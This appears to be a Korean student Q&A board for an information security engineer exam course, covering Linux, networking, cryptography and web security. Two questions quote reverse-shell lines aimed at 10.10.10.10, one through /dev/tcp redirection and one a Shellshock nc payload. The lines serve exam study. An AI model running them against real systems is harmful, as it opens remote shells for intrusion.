68강 dns 동작방식 설명에 원노트 자료 어디서 볼 수 있을까요?
개인적으로 정리하는데 이미지가 있으면 좋을거 같아서 문의 드립니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
원노트 자료 다운로드
원노트 자료는 어디서 다운로드 가능할까요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
원노트 자료
원노트 자료 어디에서 확인 할 수 있나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
개보법
개인정보 유출 통지와 파기의 경우 지체없이 알리거나 파기해야된다고 나와있는데 여기에만 (5일 이내)라고 적혀져 있는데 법령 사이트에서는 안나와있어서요 왜 5일이내 인가요?? 그리고 개인정보보호법에서 지체없이가 나오면 모두 5일 이내라고 봐야되나요??
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
노트 자료
강의에서 사용된 노트 자료는 따로 다운 받을 수 있나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
원노트 자료는 어디서 구할 수 있나요?
강의에 사용 된 원노트 자료는 어디서 확인할 수 있을까요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
아이노드 리스트에 관하여
파일 텍스트를 hello 에서 world 로 변경하였을 경우 5byte에서 5byte로 파일 크기에 변화가 없는데 이 경우에는 그럼 M, A 만 바뀌는건가요?(=change time은 바뀌지 않나요?)
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
필기노트 pdf자료 받을수 있나요?
25강 버퍼오버플로 공격 설명전에 프로그램 작동방식에 대해 자세히 설명해주셔서 좋았는데요, 교재에는 프로그램 작동방식이 자세히 안나온듯합니다. sp sfp ret 설명해주신 자료를 혼자 공부할때 다시 보고 싶은데 필기노트pdf자료를 여기 사이트나 알기사카페에서 제공해주시나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
php 문의( 어플리케이션 보안관련)
안녕하세요 선생님 책하고 강의보다가 궁금한게 있는데요 첨부파일에 보면 $black list = array( 이하 생략 ~~~~; 이 부분에서 //허용하지 않는 문자리스트(../,./,%,..\,.\)이렇게 작성되어있씁니다. 이스케이프문자였던가 강의해서 그렇게 알려주신걸로 생각되는데 근데 ..\랑 .\는 왜 \\\\ 이렇게 되어있는걸까요.? 구글링해도 안나오더랍니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
sudo 명령 관련하여 질문드립니다.
[sudo 명령어 및 sudoers 파일 설정]에서 "sudo 명령을 실행할 호스트의 호스트명을 또는 IP, 모든 서버가 대상이면 ALL 지정"에서 sudo 명령이 다른 호스트에서 실행이 될 수 있는가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
실기시험질문
실기험볼때 리눅스명령어말고 예로 RUDY 같은거 rudy 이렇게 답안적으면 틀리나요?>
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
질문
실기 145번 문제 (c) /home \(-type f -a -perm -2 \ ) -print 여기서 해석이 기타사용자에게 쓰기권한파일출력이라되어있는데 기타 사용자( others) 인걸 어떻게아는건가요?> 그리고 -a 뜻이궁금합니다
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
I/O redirection 질문드립니다
/bin/bash > /dev/tcp/10.10.10.10/8081 0<&1에서 bash 쉘의 출력을 TCP 클라이언트 소켓으로 재지정했다는 내부적인 의미가 FDT의 1번이 stdout에서 /dev/tcp/10.10.10.10/8081으로 변경된거라고 생각했습니다. 그래서 0<&1으로 입력까지 TCP 클라이언트 소켓으로 받을 수 있게 된거라고 이해를 했는데요, 생각해보니 ㅁㅁ > /dev/null 2>&1의 경우는 출력은 버리고 에러는 표준출력으로 보내는거였는데, 그럼 FDT의 1번이 /dev/null로 변경된게 아닌 것 같아서 혼란스럽습니다. &1을 단순히 stdout으로 생각해야할 것 같은데, 그럼 0<&1으로 입력까지 TCP 클라이언트 소켓으로 받을 수 있다는게 이해가 되지 않습니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의 Section 144 RSA 생성방법 변경요청
RSA 암호생성 방법 방법이 이상합니다. 교제에는 1. 키를 생성하기 위한 p와 q 생성 N=p*q 2. 키 생성을 위한 중간 숫자 L 계산 L = lcm(p-1, p-1) 3. 중간 숫자 L을 이용해여 공개키를 위한 E 찾기 (단, E는 1 보다 크고 L 보다 작으며, gcd(E,L)=1 이다.) 4. 중간 숫자 L과 공개키 숫자 E를 이용하여 개인키 숫자 D 찾기 (단, D는 1 보다 크고 L 보다 작으며, E*D mod L=1 이다.) 라고 젹혀있는데요. 실제 RSA 생성방법은 아래와 같거든요. 1. N = p * q를 구한다. 2. φ(n)=(p-1)(q-1)를 계산한다. 3. φ(n)보다 작고 φ(n)과 서로소인 임의의 자연수 e를 선택한다. 4. 1 = ed mod (p-1)(q-1)를 만족하는 d를 찾는다. 예를 들어 p가 3, q가 7이라면 N은 33, φ(n)은 20, N과 서로소인 e를 13으로하면, d는 17이 되어 공개키는 (33, 13) 비밀키는 17이 됩니다. 강의를 이렇게 수정하였으면 좋겠습니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
문제집 snort rule 문의
13년 2회 기사 랑 18년 12회 기사 문제가 똑같이 둘다 Http get flooding 공격으로 content는 요청헤더 문자열 패턴 매칭하는 탐지룰인데 한쪽은 목적지 ip 기준이고 한쪽은 소스 ip 기준인데 상관 없는 건가요?? 그리고 Snort rule 순서는 크게 상관없나요 ?? nocase랑 depth 위치가 서로 달라서요 답변부탁드립니다. 감사합니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
root 원격접속제한 관련 문의
강의 듣다가 궁금한게 생겨서 질문드립니다. root원격 접속을 제한하는 방법에는 1. /etc/ssh/sshd_config에서 PermitRootLogin = No 로 바꾸는 방법 2. PAM 모듈 사용을 통해 root 원격접속을 제한하는 방법 2가지가 있는데, PAM모듈에서 root원격접속을 제한하고, 서버에서 1번 설정을 YES로 하는 경우에 root로 원격접속이 가능한건가요? 반대의 경우, (PAM모듈에는 root원격접속을 제한하지 않도록 설정하였으나, /etc/ssh/sshd_config 에서는 root원격접속을 제한한경우) 에도 root 계정 원격접속이 가능한건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
p619 워터링홀 침해사고분석 부분 ssh 포트포워딩부분 질문있습니다.
여기선 ssh 리모트 포트포워딩을 이용하는 것으로 알고있습니다. 619page의 (다) 항목에서는 ssh클라이언트 등의 추가 공격도구를 "다운로드"한다 라고 적혀있는데 (다)-1 항목에서는 ssh 클라이언트를 알기사 사이트 관리자 pc로 "업로드"한다라고 적혀있습니다.. ssh 리모트 포트포워딩을 위해선 관리자pc로 "업로드"가 맞다고 생각하는데 (다)에서 업로드가 아닌 다운로드라고 표현한 것은 표현의 편리상 그냥 "다운로드한다"라고 한건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
tcp wrapper 데몬관련해서 질문드립니다
telnet데몬 관련해서 hosts.allow나 hosts.deny파일에 등록할때 서비스명을 in.telnetd로 설정하는것으로 교재에 나와있었는데요(마찬가지로 ftp도 in.ftpd로 나와있었구요) 문제편에서보니 ssh를 등록할때는 서비스명을 sshd로 등록하는것으로 나와있는데 telnetd앞에 in은 어떤의미인건가요?? telnet과 ftp에는 in을 붙이고 ssh에는 in을 안붙이는건가요??
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
Set 전자서명
Set 전자서명에서 참여자역할을 예로 들어주실 수 있으신가요?? 제가 생각한 바로는 issuer 가 요즘 카카오 지불카드와 같은 거고 acquirer 은 예를들어 kb은행 지불게이트웨이는 kb pay 나 결제 시스템으로 생각하면 되나요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
아파치 설정 문의
안녕하세요 어플리케이션보안 문제 풀다가 문의 드리게 됐습니다. 아파치 웹서버에서 timeout, keepalivetimeout 설정의 차이가. Timeout은 예를들어 클라이언트가 slow post dos와 같은 공격을 했을 때 메시지 헤더나 바디에 타임아웃 설정을 해서 그 요청 세션을 종료하는 것이고 Keepalivetimeout은 tcp 연결에 대한 timeout 설정으로 이해했는데 이게 맞나요??
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
웹 서버 캐시서버 설정문의
질문이 여러개인데 너무 헷갈리네요 ;; 1. Cache-control 헤어의 max-age=0 와 no-cache 가 동일성 윰무에 대해 체크하는 차이만 있다고 나와있는데 동일성 유무 체크라는 게 정확히 어떤 메커니즘의 체크를 말하는 건가요? 2. 캐시 검증하는 헤어 설정이 User-agent 헤더에서 must-revalidate 와 no-store ( cc attack 시 쓰임 ) Cache-control 헤더의 max-age=0, no-cache 는 왜 다른 헤더를 사용하나요?그리고 서로 어떤 목적의 차이가 있는지 알려주실 수 있나요?? 3. 마지막으로 Cache-control 헤더의 max-age=0, no-cache도 cc attack 시 사용하는 헤더 설정이 될 수 있는지 궁금합니다. 감사합니다. ^^
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
문제집 문의
안녕하세요 올해 목표로 기사준비중인데 21년실기문제지로 공부히고있는데 올해 실기문제지도 변경사항ㅇ이 많은가요??
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
강의 자료
전반적인 강의 내에서 활용하신 책 이외의 원노트 자료는 어디서 확인할 수 있나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
개행문자 문의
개행문자(crlf)를 핵사코드로 적을 때 0x0d0a가 맞나요 0x0d0x0a가 맞나요??? P418강의에서는 cr과lf를 분리해서 설명해주시고 p241강의에서는 0x0d0a라고 책에 적혀있어서요
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
경로 추적 관련 질문
교수님 안녕하세요. 작년까지는 파일 다운로드 내 Directory Traversal 공격이 같이 설명이 되어있었는데 22년 교재부터는 따로 섹션이 분리되서 설명이 되어있습니다. 분리가 되어 있으니 강의 보다보니 너무 헷갈려서요.. 제생각에는 Directory Traversal이 가능하기 때문에 파일 다운로드 취약점이 발생하는 걸로 이해를 했는데 맞는건지 궁금합니다.. 두개 내용만 봤을때는 너무 헷갈리네요 ㅠㅠ 감사합니다!
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
로그파일 답안 작성시
로그파일 답안 작성시 사진의 67번 문제처럼 utmp(x),wtmp(x) 처럼 (x)를 붙여 쓰는 답도 있고, 68번 문제처럼 utmp,wtmp와 같이 (x)를 붙이지 않는 것도 있는데 이 둘의 차이점이 있나요? 있다면 언제 (x)를 붙여야 하는지 궁금합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
리눅스 시스템에서 파일명
62번 문제처럼 파일명을 입력하라고 하면 /etc/inetd.conf 가 아닌 inetd.conf라고만 하면 오답처리가 되는 건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
간단하게 궁금한 것들 질문드립니다.
1. 계정을 생성할 때, /etc/login.defs 파일을 통해 패스워드 정책을 설정한다고 배웠습니다 그러면 이때 login.defs 파일을 통해 설정된 패스워드 정책이 /etc/shadow 파일에 저장되는 게 맞겠죠? 2. 프로세스가 기동되면 가상메모리를 할당받는데, 가상메모리는 유저영역+커널영역으로 나뉜다 했습니다. 이때 유저영역은 프로세스가 사용하는 공간이라 했는데, 유저영역에는 대표적으로 PCB와 FDT가 존재합니다. 각각의 기능은 PCB를 통해 해당 프로세스가 자신의 상태를 관리하고 (ready, running, blocked, terminated) FDT를 통해 자신이 오픈한 파일디스크립터들을 관리하는 것이 맞나요? 3. 관리목적의 시그널에 대표적으로 SIGINT, SIGKILL, SIGSTOP이 있다고 했는데 SIGKILL과 SIGSTOP은 임의로 처리하거나 무시할 수 없는 시그널이라 했는데 SIGINT도 똑같이 임의로 처리하거나 무시할 수 없나요? 언급이 따로 없으셔서 궁금해서 질문드립니다. 그리고 SIGINT의 기능이 해당 시그널을 받은 프로세스는 Default로 종료되고, 터미널 제어권을 넘긴다 했는데 이 터미널 제어권을 넘겨받는 대상이 커널인지 아니면 해당 종료되는 프로세스를 실행시킨 프로세스인지 궁금합니다. 4. Linux 계정의 비활성화 기간은 계정만료일 이후에, 패스워드를 변경하도록 하는 일종의 유예기간으로 이해했는데 맞을까요? 그리고 분명히 말씀주셨던 건데 중요한건 아닌거 같지만 실습해보니 좀 다른거 같아서 질문드려요 제 기억으로는 해당 유예기간동안 로그인을 시도할 시 로그인은 되는데, 비밀번호를 변경하라 하는데 해당 기간이 지나버리게 되면 관리자를 통해 비밀번호를 바꿔야 한다고 하셨거든요 그런데 제가 지금 CentOS7 환경에서 테스트해보니 20220410으로 계정만료일을 설정하고 테스트해보니 로그인이 안되고 관리자한테 연락하라고 나옵니다. 그리고 root로 su [만료된계정] 으로 하면 로그인은 되는데 이런 경우는 특별한 경우니 무시해도 되는 거죠? 테스트해본 결과 CentOS7에서 계정 만료일이 만료되고, 비활성화 기간 동안 로그인이 불가능하며 관리자에게 문의하라 뜹니다. 그리고 만료일이 3일 남은 상태에서 이전 경고일수와 비활성화 기간이 7로 설정되어 있음에도 불구하고 경고 알림이 보이진 않네요 어떻게 기억하는 게 교과서적으로 맞을지 헷갈려서 질문드립니다..ㅠ 5. crontab파일은 사용자별로 만들어져서 관리가 된댔는데 crontab 명령어는 /etc/crontab 파일에 대한 명령어로 알고 있습니다. 이때 사용자별로 만들어진다길래 찾아보니 스케줄러가 /var/spool/cron 디렉토리에 계정별로 파일 형태로 저장되어 있다고 합니다. 여기서 좀 헷갈리는 부분이 root는 /etc/crontab에 스케줄러를 등록하고 일반 사용자는 /var/spool/cron에 파일형태로 스케줄러를 등록하는 게 맞을까요? 그래서 /etc/cron.allow 및 /etc/cron.deny 파일을 통한 crontab 명령어 접근제한은 root는 /etc/crontab 파일을, 다른 일반 사용자는 /var/spool/cron에 자신의 cron파일을 접근하는 것을 제한하는 설정인지 궁금하여 질문드립니다. 6. xinetd의 설정파일 주요 옵션 중에 cps는 초당 연결개수가 초과되면 일시적으로 서비스를 중지시키는 옵션이잖아요? 이때 초당 연결개수라는 것이 동일한Client로부터 발생하는 초당 연결개수를 의미하는 거겠죠? 7. 그리고 xinetd 설정파일 주요 옵션 중 per_source 옵션은 동일한 Source IP로 부터(즉, 동일한 Client로부터) 동시 연결개수에 제한을 두는 옵션으로 알고 있습니다 그러면 만약에 HTTP 서비스에 해당 옵션을 적용한다면, Client는 Keep-Alive 속성에 의해 추가자원을 동시에 요청할 때 해당 per_source가 5라면 5개의 동시연결 요청만 수행하고 다시 TCP연결을 맺은 후 Keep-Alive에 의해 5개를 요청하고 이렇게 제한되는 게 맞을까요? 글이 길어지다보니 이어져서 보여서 메모장으로 별도 단락 구분지어 첨부했습니다. (여담인데 아마 이것도 파일업로드 입력값 검증을 안 하는 걸까요 ㅎㅎ img파일만 가능한데 txt파일도 올려지네요) [+] 아 그리고 syslog나 rsyslog의 경우 (r)syslog로 적어도 되나요? 아니면 리눅스의 경우 전부 syslog로 적어야 하나요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
문제편 질문드립니다.
1. 43번 문제의 (B) 문항 질문입니다. "스택에서 리턴 어드레스를 수정하면" 를 보고 스택버퍼오버플로우 공격이라고 생각했지만, 정답에는 버퍼오버플로우로 되어있네요. 버퍼 오버플로우가 맞는거라면, 스택버퍼오버플로우가 되려면 어떤 키워드들이 더 필요한지 알려주세요. 2. 24번 문제 TMOUT=600; export TMOUT export를 통해 환경변수로 설정하는 이유가 해당 쉘이 아닌 자식 쉘까지 모두 타임아웃을 설정하기 위해서인가요 ? export를 환경변수를 통해 어떤 설정으로 다른 사용자들에게 어떤 영향이 끼치는지 궁금합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의자료 받을 수 있는건가요??
강의도중에 추가자료같은거 출력해서 보라고 하셨는데 어디서 받는지 모르겠습니다. 받을 수 있는건가요??
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
질문
대학교에서 PCB는 운영체제가 관리하기 위해 커널 영역에 유지하는 정보라고 배웠는데 여기서는 유저 영역이라고 나와서 헷갈리네요! 어느것이 맞나요? 또한 커널 영역 하나에 여러 프로세스의 pcb을 저장하는것으로 배웠는데 이 책에서는 프로세스별로 user,kernel 영역이 존재하는 건가요? 그렇다면 system open file table은 같은 내용을 커널 영역이 함께 공유하는 건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
2021 실기 문제지
146번에 백업파일의 접근권한을 644에서 600으로 변경하고, 백업파일 쉡 스크립트 파일의 접근권한을 소유자만 사용가능하도록해서 700으로 설정됐는데 백업파일접근권한이 왜 600으로 설정해야 하는지랑 쉘 스크립트 파일의 접근권한은 소유자만 사용가능하다고 한 것이 실행권한 어떤 권한(r,w,x중)을 의미하는지 아니면 이것도 표준화 돼있는 건지 궁금합니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
취약성과 취약점?? 실제 시험에선 어떻게 적어야 할까요?
위험관리쪽 보안용어를 살펴보면 <자산, 위협, 취약점or취약성>이 나오는데요 이때 교재+핵심자료를 보면 교재에는 "취약점: 위협의 이용대상으로 기술적, 물리적, 관리적 약점"이라 정의되어 있고 핵심자료(인강)에는 "취약성: 자산의 잠재적 속성으로 위협의 이용대상이 되는 것"이라 나와있습니다. 찾아보니 취약성->내포하고있어서 미래에 발견될 개념 취약점->취약성이 발견되어 판명된 현재의 개념 이라고도 표현해서, "취약성"보다는 "취약점"이 더 옳은 표현에 가깝다고 하시는 분들도 있고.. 솔직히 이런 사소한 거 신경 안 쓰고, 둘이 구분없이 취약점이나 취약성으로 마음 편하게 적고 싶지만.. 워낙 시험에 대해 채점기준이 모호하기도 하고 깊게 들어가면 취약성과 취약점이 한끗차이로 의미가 조금 변질될 수도 있다보니 어떤 답을 쓰는 게 명확하고 분란의 여지가 없을지 싶어서 질문글 남기게 됐습니다. 혹시라도 위험의 구성요소를 적으라 하면, <자산, 취약점(취약성), 위협, 정보보호대책>으로 괄호로 묶어서 적어도 될까요? 감사합니다
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
주요 취약점에 NTP, SSDP 분산 서비스 거부(DDoS) 취약점 질문드립니다.
[Q1] "NTP 분산 서비스 거부(DDoS) 취약점"과 "SSDP 분산 서비스 거부(DDoS) 취약점" 둘 다 내용을 보면 결국 "NTP 증폭 DRDoS 공격", "SSDP 증폭 DRDoS 공격"으로 보이는데 DDoS로 표현한 이유가 무엇일까요?ㅠㅠ 분산된 곳(여러 NTP/SSDP서버)에서 다수의 inbound되는 패킷이 발생하니 좀 좁게(?) 보면 DDoS(분산 서비스 거부) 공격이 맞다고도 보여지는데 큰 공격원리를 보면 결국 공격자의 Source IP스푸핑 -> 요청대비 큰 응답을 주는 NTP에 monlist, SSDP에 M-SEARCH 요청을 보냄으로써 byte가 큰 응답으로 '증폭'시켜서 희생자에게 '반사'시켜 응답되게끔 함 DRDoS 공격의 정의를 의미하고 있는데 시험에 만약 나오면 어떻게 적어야 할지 모르겠습니다 ㅠㅠ 만약 문제에 "지금 해당 트래픽이 어떤 상황을 의미하는지 쓰고, 그 원리와 대응책을 적어라"라고 했을 때 NTP 증폭 DRDoS 공격이라 적는게 맞을지 NTP 분산 서비스 거부(DDoS)라 적는게 맞을지 모르겠습니다. 까딱 잘못하면 키워드가 없다고 틀릴까봐 염려스러워서 질문드립니다.. ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ [Q2] 정보보호 개요에 나오는 부분인데요 필기 때 정리해둔 것과 구글링해서 찾아봤을 때 "위험=위협x취약점x자산" 이라고 나와있는데 실기 교재에는 "위험=위협x자산가치x취약성 or 위협성공가능성x위협 성공시 손실크기"라 나와있더라구요 정리해보면 "위험=위협x자산x취약점x위협 성공시 손실크기"인 것 같은데 "위협 성공시 손실크기"를 곱하는 게 맞나요? 곱하지 않는 게 맞나요? 문제에 위협 성공시 손실크기가 있으면 곱하면 되고 없으면 곱하지 않으면 되는 걸까요? 갑자기 새로운 항목을 곱하길래 찾아보다가 답이 명확히 서지 않아서 추가로 질문드려봅니다
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
DNS 서버 보안 질문있습니다!
named.conf에서 version "unknown"으로 버전 정보를 지워버리면 slave는 어떻게 동기화를 하나요? ixfr 못쓰고 axfr만 써야하는 건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
GNU bash 취약점 (ShellShock) 질문드립니다
전반적으로 이해는 되는데 교재 및 인강에 있는 내용을 글로 풀어서 써보려니 이게 맞을지 궁금하여 질문드리게 됐습니다. ------------------------------------------------------------------------------------------------------------------------------------------------------- 쉘에는 다양한 쉘이 존재하는데, 대표적으로 Linux의 bash쉘의 경우 ShellShock이라 불리는 Bash 취약점이 존재합니다. 해당 취약점은 쉘이 만약 동작하게 될 때 전역변수나 함수 등 전역적으로 사용되는 것들을 사용하기 위해 환경변수를 참조하는데요 이때 환경변수에 "함수"가 저장되어 있을 때("() {" 구문이 있을 때), 함수 선언문의 끝을 구분하지 못해서 ;(세미콜론)을 통한 추가적인 임의의 명령어가 존재할 시 해당 명령어까지 쭉~ 실행시키게 되는 취약점입니다. 이때 환경변수를 읽어들이는 대표적인 기술이 CGI입니다. 이 CGI는 요청헤더정보를 환경변수에 다 등록을 하고, Bash쉘 프로세스에게 전달하여 처리하게끔 하는데 이때 요청헤더정보에 "함수구문"이 존재하고, ShellShock 취약점이 존재하는 Bash쉘이 이를 처리한다면 위에서 말했던 취약점대로 추가적인 명령어까지 실행하게 됩니다. 따라서 이를 이용하여 추가적인 명령어에 악의적인 명령어를 넣음으로써 리버스쉘 연결, 악성코드 다운로드, 웹쉘 생성 등을 수행할 수 있게 됩니다. ------------------------------------------------------------------------------------------------------------------------------------------------------- 선생님, 제가 이해한 바가 맞을까요? 그리고 CGI에 대해서는 찾아보면 볼수록 너무 헷갈려서 단순히 "웹서버가 HTTP요청메시지를 응용프로그램(대표적으로 Bash쉘 프로세스)에게 전달하여 처리한 후, 처리결과를 Client에게 응답으로 내려주는 기술"이라고 숙지하려고 하는데 문제가 없을까요? -------------------------------------------------------------------------------------------------------------------------------------------------------- 그리고 함수구문 뒤에 추가하는 임의의 명령어 중에 () { :; }; /usr/bin/nc 10.10.10.10 80 -e /bin/bash 이렇게 적으면 사실상 쉘에서 nc 10.10.10.10 80 -e /bin/bash 명령어가 실행되는 거잖아요? 근데 악성코드쪽을 보면 () { :; }; /bin/bash -c "~~~~~~; ~~~~~~~~; ~~~~~~~; ~~~~" 이런 식으로 -c옵션을 통해서 문자열을 명령문으로 인식하고 실행시키도록 한다는데 () { :; }; /usr/bin/nc 10.10.10.10 80 -e /bin/bash 이거랑 무슨 차이가 있는지 궁금합니다. 여러 명령문을 넣을 때 그냥 ~~~~; ~~~~; ~~~~ 넣는 것보다 /bin/bash -c "~~~~"로 넣는 게 더 효율적이라 그런건가요?? 그냥 여러 형식으로 이렇게도 공격할 수 있다는 걸 보여주신 걸까요? 어차피 nc명령어나 wget 명령어나 bash쉘에서 동작하는 건 똑같지 않나요?? 굳이 자식쉘을 하나 더 만들면서 악성코드를 다운로드 한 이유가 궁금합니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
Xmas스캔 정의 문의드립니다
1. 실기 이론서 Xmas 스캔 정의에는 u p f플래그 설정으로 되어있는데, 개념은 이해되는데 필기 교재와 약간 다른거같아서 문의드립니다 2. 스텔스 범주도 필기(ack포함 등)와 약간 다른데, 실기기준으로 ack스캔빼고 syn 스캔포함하여 정리하면 될지도 문의드립니다 크게 중요해보이진않지만 조금 혼동이되어 문의드립니다 바쁘신데 미리 답변 감사드리며, 정말 좋은 강의와 에너지를 주셔서 진심으로 감사드립니다^^(합격하고 감사인사 다시드리고 싶네요ㅠ^^)
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
프로세스 응용
프로세스 개요에 나오는 user area와 kernel area는 모두 메모리에 올라가는 커널 주소 공간(stack, data, code)에서 data영역에 올라가는거 맞나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
선생님 SSL/TLS 완전 협상 복습 다시하는데 일전에 질문 답변 주신게 또 햇갈려서요.. ㅜ
선생님 가독성이 너무 안좋아서 메모장으로 글 올렸습니다 . 감사합니다 ㅜ 혹시 메모장도 안보일 경우.. 아래 질문도 같이 올려드립니다.. 1) CA(인증기관)으로부터 절차를 통해서 인증서를 최종적으로 발급받게되면 "공개키에 대한 인증서"와 그 쌍이 되는 "개인키"파일을 안전한 경로로 전달받게 됩니다. --> 여기서 공개키에 대한 인증서는 CA의 개인키로 서명한값이 있는 인증서가 되는 것으로 이해됩니다. 2) 인증서라는 것은 공개키에 대해서 인증기관(CA)이 서명한 전자문서입니다. 따라서 우리가 흔히 인증서라고 하면 그 인증서에는 공개키가 들어있고 그 공개키이 소유자, 발급자를 확인할 수 있는 정보가 포함되어 있습니다. - 인증서와 개인키는 웹서버에 설치가 됩니다. --> 여기서 말하는 인증서 안에 들어있는 공개키는 algisa.com 첨부의 그림파일처럼 RSA 공개키가 되는 걸까요?> 3) 인증서를 검증하는 첫단계는 올바른 인증기관에서 발급한 인증서인지를 검증하게됩니다. 따라서 인증서에 포함되어 있는 베리사인 전자서명을 검증하게 되는데 이를 검증하려면 베리사인 공개키가 필요하겠죠? 어디에 있을까요? 윈도우의 경우에는 윈도우 시스템내에 신뢰할 수 있는 최상위 인증기관 목록과 인증서를 관리하고 있습니다. --> 여기서 말하는 베리사인의 공캐키는 첨부파일의 Algisa.com 서버의 RSA 공개키가 아니며, 윈도우에서 관리 하는 Root CA 의 공개키가 된느 걸까요? 즉 정리하여 말씀드리면 첨부파일의 RSA algisa.com 웹서버의 공캐키와 질문드린 3)의 윈도우 내에 관리하고 있는 CA의 공개키는 다르다. 또한 단지 인증서가 올바른것인지 검증하기 위해 Server certificate 를 통해 인증서를 전달할시 윈도우에서 관리하는 RootCA의 공개키로 검증 한다 더불어, Client Key Exchange 과정에서 Premaster Secret 등을 Algisa웹서버의 RSA 공개키 (인증서내에 포함된 = 즉 본 게시글의 이미지 첨부파일) 암호화하여 서버 측으로 전달된다. 이게 제가 이해한게 맞을까요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
Iptables
Iptables 교제 내 실습에서 Iptables -A INPUT -p tcp —syn —dport 80 과 같은 형태의 룰들이 많이 나오는데 출발지 ip 기준인지는 어떤 설정에서 정하는 것인가요?? INPUT 체인도 목적지 ip 기준 룰 작성할 수 있나요??
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
dig 명령어 질문
강사님 안녕하세요. dig 명령어 중 옵션에 +norecurse 옵션에 대한 부분이 잘 이해되지 않아 질문 올립니다. 알기사 카페도 찾아본 결과 제 생각에는 norecurse 옵션을 주는 이유는 authoritative 서버가 recursive 질의를 하여 결과 반환하는 것이 아닌 iterative Query만을 이용하여 결과를 리턴하도록 설정하는 걸로 이해 했는데 맞는지 궁금합니다. 감사합니다!
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
[44강] 4way handshake 실습 중 시퀀스 넘버 질문
[44강] 4way handshake 실습 중 시퀀스 넘버 질문 44강 48분쯤 와이어샤크로 4way handshake 패킷을 분석하는 부분에서 1. ack패킷(xp->fedora) 2. fin+ack패킷(fedora->xp) 3. ack패킷(xp->fedora) 4. fin+ack패킷(xp->fedora) 5. ack패킷(fedora->xp) 패킷흐름을 볼 수 있습니다. 궁금한점은 위 1번, 3번, 4번 패킷의 시퀀스넘버는 왜 증가하지 않는가? 입니다. 교재 181p의 3way handshake 할때는 1씩 증가하는것으로 설명을 보았고, p179의 시퀀스 넘버의 설명을 보면 송신시 전송하는 데이터의 바이트 단위로 부여하는 연속된 번호라고 들어 이해가 잘 가지 않습니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
참고자료 질문
수업중에 참조되는 강의자료 및 핵심자료는 어디서 다운받을 수 있나요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
크롬에서 강의를 듣기 위해 starplayer가 켜지는 순간, 자동으로 가상 머신이 shutdown 되어 실습을 못하고 있습니다..
크롬에서 강의를 듣기 위해 크롬 내부에서 스타 플레이어가 켜지는 순간, 미리 실습을 위해 켜 놓은 가상머신 (linux 가 설치되어 있는 virtual box 최신 버전-6 버전)가 자동으로 shutdown 되는 바람에.. 실습을 따라하지 못하고 있습니다... ㅠㅠ 인터넷 검색을 해보면, 버추얼 박스를 5.0.22 버전을 설치해서 해결할 수 있다고 적혀 있는데요.. 해당 버전을 설치 및 실행하려고 시도해 보아도, 윈도우 10 x64 (21H2) 환경에서 호환성 문제로 실행이 불가능하여, 실습을 따라하지 못하고 있습니다. 원래 강의를 듣는 PC에서, 동시에 가상머신을 켜서, 리눅스 실습이 불가능 한 건가요? 아니면 해결 방법이 있는 건가요? (현재 저희 집 환경은, 칼리 리눅스는 다른 노트북B 에 설치되어 있지만, 강의를 듣는 PC(노트북A)에서도 가상머신상에 리눅스(CentOS_7)를 켜서, 칼리 리눅스(노트북B)에 접속해보는 여러가지 테스트를 하고 싶습니다..)
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
robots.txt
설정에서. 디렉터리 접근 설정할때 /디렉터리명/처럼 디렉터리명 양쪽으로 있어야되나요? 아니면 /디렉터리명 이렇게만 있어도 되나요?? 페이지마다 달라서 문의드립니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
쿠키
쿠키 파일이 4kb 미만이여야 되거나 이런 문제는 이제 없나요?? 보안기사문제에서 4kb이상도 이제 저장된다고 봤던 거 같아서요
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
TCP SYN Flooding 대응책 관련 문의
